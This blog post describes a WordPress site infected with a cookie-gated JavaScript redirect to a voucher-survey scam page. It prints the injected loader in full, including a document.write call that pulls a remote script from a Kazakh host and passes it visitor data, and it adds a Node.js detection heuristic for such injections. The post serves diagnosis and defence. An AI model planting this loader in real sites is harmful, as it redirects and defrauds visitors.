WordPress Redirect Spam

Sneaky Spam JavaScript Redirects WordPress Visitors

I visited a site yesterday and without action on my part, got redirected to some spam advert. I tried to recreate what happened by revisiting the site, but it just loaded as expected. Visited the same site again today, got the redirected spam page again.

Google revealed nothing, so hopefully this will put somebody else onto the scent of this WordPress injected JavaScript spam redirection.

The site I got redirected to, judging by the domain, is probably extremely disposable, so it likely changes often. I got redirected to vpizz.rewards.7031.ws/?sov= with a very long URL featuring all sorts of variables: &hid, &&nopop, &noalert, &redid, &gsid, &id, &impid, etc.

The popup text says:

Dear browser user,

You are today’s lucky visitor for: December 6, 2016

Please complete this short survey and to say “Thank you” we’ll give you
a chance to win a Mydin RM1000 Voucher®, a Giant RM1000
Voucher®, or a Tesco RM1000 Voucher®!

Button: OK

I’m based in Kota Kinabalu, the website I visited was for a business in Kuala Lumpur, and the company names of the supposed vouchers are actual Malaysian companies.

 

I had a quick look in the source code of the website to see if I could see anything suspicious.

Everything in the header looked fairly standard, but then I encountered an unusual area that had 98 lines of blank space. On the first line after that, and just before the closing </head> tag, was this suspicious code:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.kec.kz/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

The script was drawing an ambiguously named file from a server in Kazakhstan. Alarm bells.

The line of code is complicated, and the full extent beyond my comprehension, but here’s the gist:

  • On your first visit your browser gets a cookie named “__cfgoid” – I think it lasts 30 mins, but looks like it varies;
  • You’re then redirected to the spam website;
  • If you revisit the original site immediately, nothing happens, because cookie;
  • When you come back later (I revisited some 24 hrs later), the process repeats;
  • If, after your first visit, you delete the cookie and revisit the original site, it redirects you to google.com, to avoid suspicion (so logs your IP or something more invasive?);
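
Because the cookie gate hides the redirect on repeat visits, it is more reliable to check the page's static HTML than to wait for the redirect to happen again. The following is an added example, not code from the original post or from the injected script: a Node.js heuristic that flags the traits listed above in everything before the closing head tag. The check labels, the thresholds and the placeholder host injected.example are assumptions, and the sample pages are constructed.

```javascript
// Added example, not code from the original post. Check labels and the
// thresholds (20 line breaks, 3 findings) are assumptions for illustration.
const CHECKS = [
  ['document.write injects a remote script', /document\.write\(\s*['"]<script[^>]*\bsrc=/i],
  ['closing script tag split across strings', /<['"]\s*\+\s*['"]\/script>/i],
  ['cookie gate: reads, then sets, the same cookie',
    /getCookie\(\s*["']([\w-]+)["']\s*\)[\s\S]*?setCookie\(\s*["']\1["']/],
  ['page URL or referrer sent to the remote host',
    /document\.write[\s\S]*(?:document\.referrer|window\.location)/],
  ['remote .php file loaded as a script', /['"]https?:\/\/[^'"]+\.php['"]/i],
];

// Scan everything before </head>, where the post found the injection.
function scanHead(html) {
  const head = html.split(/<\/head>/i)[0];
  const findings = [];
  // A long run of empty lines pushes injected code out of sight in "view source".
  const pad = head.match(/(?:[ \t]*\r?\n){20,}/);
  if (pad) findings.push(`${pad[0].split('\n').length - 1} consecutive line breaks`);
  // Inspect inline scripts only (opening tag without a src attribute).
  const inline = /<script\b(?![^>]*\bsrc=)[^>]*>([\s\S]*?)<\/script>/gi;
  for (const m of head.matchAll(inline)) {
    for (const [label, re] of CHECKS) {
      if (re.test(m[1]) && !findings.includes(label)) findings.push(label);
    }
  }
  return { findings, suspicious: findings.length >= 3 };
}

// Constructed samples. injected.example is a placeholder host, and the script
// is a shortened stand-in for the one quoted in the post.
const INJECTED = `<script>null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),` +
  `document.write('<script type="text/javascript" src="' + ` +
  `'http://injected.example/js/jquery.min.php' + '?utm_content=' + window.location + ` +
  `'&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>'));</script>`;
const INFECTED_PAGE = '<html><head><title>Shop</title>' + '\n'.repeat(99) + INJECTED +
  '</head><body></body></html>';
const CLEAN_PAGE = '<html><head><title>Shop</title>\n' +
  '<script src="/wp-includes/js/jquery/jquery.js"></script>\n' +
  '<script>window.dataLayer = window.dataLayer || [];</script>\n</head><body></body></html>';

for (const [name, page] of [['infected', INFECTED_PAGE], ['clean', CLEAN_PAGE]]) {
  const r = scanHead(page);
  console.log(name, r.suspicious ? 'SUSPICIOUS' : 'ok', r.findings);
}
```

Run it against HTML saved from a request that sends no cookies, so the page is seen as a first-time visitor sees it.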

Because it’s not my site and I don’t have access to the files, I can’t tell where it came from, where it hides, or how it gets the code into the WordPress source.

The site runs the Piquant theme, modified in the parent theme directly, so it hasn’t been updated. They run version 1.1.1 (released 25 Apr 2016), and the original theme is currently on version 1.2.1 (released 29 Aug 2016). Changelog mostly states updates to included plugins, Instagram Feed, Revslider and Visual Composer.

The following plugins are apparent on the front page:

  • intelligent-tabulation
  • contact-form-7
  • instagram-feed
  • revslider
  • js_composer

And that’s a good reason why it’s better to create a child theme instead of modifying the original theme, so that you can keep the original theme, and the plugins that came with it, up to date and secure.

Maybe somebody has info on how to remove this particular malware?
